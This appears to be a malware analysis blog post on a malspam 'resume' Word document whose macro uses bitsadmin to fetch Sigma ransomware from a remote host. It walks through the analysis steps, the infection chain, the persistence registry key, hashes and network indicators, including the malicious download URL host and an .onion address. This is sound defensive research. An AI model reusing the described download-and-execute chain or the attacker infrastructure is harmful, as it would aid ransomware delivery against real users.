Malspam Contains Password Protected Document That Downloads Sigma Ransomware

Malware Analysis
1

I received some malspam on 03/13/18 entitled “About a internship.” The email came with an attachment called “Janeen Resume.doc”:

MalSpam
MalSpam.png?resize=746%2C269&ssl=1746×269

The email is pretending to come from somebody interested in a job opening and they have attached their “résumé.” In reality, this document is being used as a downloader for Sigma ransomware.

Opening the document confirms that it is password protected:

Inputting the password presents the victim with some instructions:

word doc
word-doc.png?resize=857%2C475&ssl=1857×475

I typically scan files for their file type and, in the case of Office documents, embedded macros. The password protected document came back as a “Composite Document File V2 Document” (OLE2 file) and both olevba.py and oledump.py showed no detections for macros:

No luck

To get around this, I simply removed the password and saved the document.

document is password protected
document-is-password-protected.png?resize=1140%2C759&ssl=11140×759
Here you can see that the document is password protected, as well as various document properties like when it was created, last modified, and the author(s).

To do that, click on “Protect Document”, remove the password, click “OK”, and then save the document:

remove password

Now, scanning the document again shows it is a “Microsoft Word 2007+” document file using the Office Open XML (OOXML) file format. Because it’s a XML-based file, we can unzip it and look at the contents:

unzip resume

Unzipping the file allows you to see the contents, including the images (image1.png and image2.png) used within the document. Also, embedded macros in XML-based Office documents are typically store in a binary file named vbaProject.bin, which we can see in the “word” directory.

Using strings we can quickly examine vbaProject.bin for any interesting ASCII strings:

strings vbaProject.bin show download location

As you can see from the image above, strings found the command and URL used to download the malware payload.

An even better option for this scenario would be to use olevba.py:

olevba output

olevba.py is handy tool because it gives analysts a table summarizing risky keywords that were found within the file. Another good option would be to use oledump.py.

Now, getting back to examining the file from the perspective of the victim… After entering the password and clicking “Enable Content” the victim’s host would make a HEAD request, followed by a GET request, for the malware payload:

HEAD and GET

You can see that the User-Agent is “Microsoft BITS/7.8”, confirming the bitsadmin tool was used to download the file. The malware payload is downloaded from the remote server and saved to %AppData% as “taskwgr.exe”.

Payload in %AppData%:

AppData

Process tree during the infection:

process tree

Some keys events on my sandbox (not a comprehensive list of events):

  • cmd.exe (PID: 4832) creates process conhost.exe (PID: 2420)
  • cmd.exe (PID: 4832) creates process bitsadmin.exe (PID: 3432)
  • svchost.exe (PID: 888) renames file C:\Users\\AppData\Roaming\BIT1F3F.tmp to C:\Users\\AppData\Roaming\taskwgr.exe
  • bitsadmin.exe (PID: 3432) kills its own process
  • cmd.exe (PID: 4832) creates process taskwgr.exe (PID: 4600)
  • taskwgr.exe (PID: 4600) creates child process taskwgr.exe (PID: 5656)
  • cmd.exe (PID: 4832) kills its own process
  • taskwgr.exe (PID: 5656) creates file C:\Users\\AppData\Roaming\Microsoft\[GUID]\taskwgr.exe
  • taskwgr.exe (PID: 5656) sets autostart registry key HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\chrome
  • taskwgr.exe (PID: 5656) creates file C:\Users\\AppData\Roaming\Microsoft\[GUID]\System.zip

A copy of the malware in %AppData%\Microsoft\[GUID]\:

Persistence mechanism:

The sample never encrypted files in my virtual lab while the sample successfully encrypted files on a physical lab (not mine). However, I didn’t have the time to do any further analysis so I can’t confirm how, or if, it’s detecting my virtualized sandbox.

When the process is complete the desktop background will be changed to a green text message over a black background (the images below were borrowed from the Internet):

image

While encrypting the system, Sigma ransomware creates ransom notes named ReadMe.txt in each folder that a file was encrypted.

Below is an image of ReadMe.html:


Sigma ransomware page:

Signa ransomware machine GUID


Hashes

SHA256: 55f497f3728c57d284bd710bb517d6d2c56f0a6cc2248cfaf649294655abc1bc
File name: Resume.doc
Hybrid-Analysis Report

SHA256: cbbb8b1b14b3df9d331ece7167ca9ab2b7da61839742a107142016d8d9c6f8e8
File name: taskwgr.exe
Hybrid-Analysis Report

Network-Based IOCs
  • 36.110.114.130 – onlinedocuments.ir – HEAD and GET – /email.bin
  • 66.212.29.250 – ip-api.com – GET /json – NON MALICIOUS
  • yowl2ugopitfzzwb.onion
Samples

Malspam Samples.zip

The password is “infected”

Article Link: https://malwarebreakdown.com/2018/03/14/malspam-contains-password-protected-document-that-downloads-sigma-ransomware/